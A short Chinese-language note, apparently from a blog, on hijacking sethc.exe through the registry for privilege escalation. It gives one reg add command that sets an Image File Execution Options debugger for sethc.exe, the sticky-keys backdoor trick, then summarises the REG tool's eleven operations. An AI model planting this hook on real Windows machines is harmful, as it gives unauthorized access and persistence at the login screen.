命令行下操作注册表劫持sethc提权

经典的利用劫持替换sethc.exe 的例子：

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"/v debugger /d taskmgr.exe /f

-----------------------------------------------------------------------------------------------------------------------------------------------

Windows 控制台注册表工具 - 版本 3.0

格式就是：REG Operation 参数列表
返回代码: 0 - 成功 1 - 失败 (除了 REG COMPARE)

Operation 有11个，可以这样得到帮助：REG Operation /?
REG QUERY
REG ADD
REG DELETE
REG COPY
REG SAVE
REG RESTORE
REG LOAD
REG UNLOAD
REG COMPARE
REG EXPORT
REG IMPORT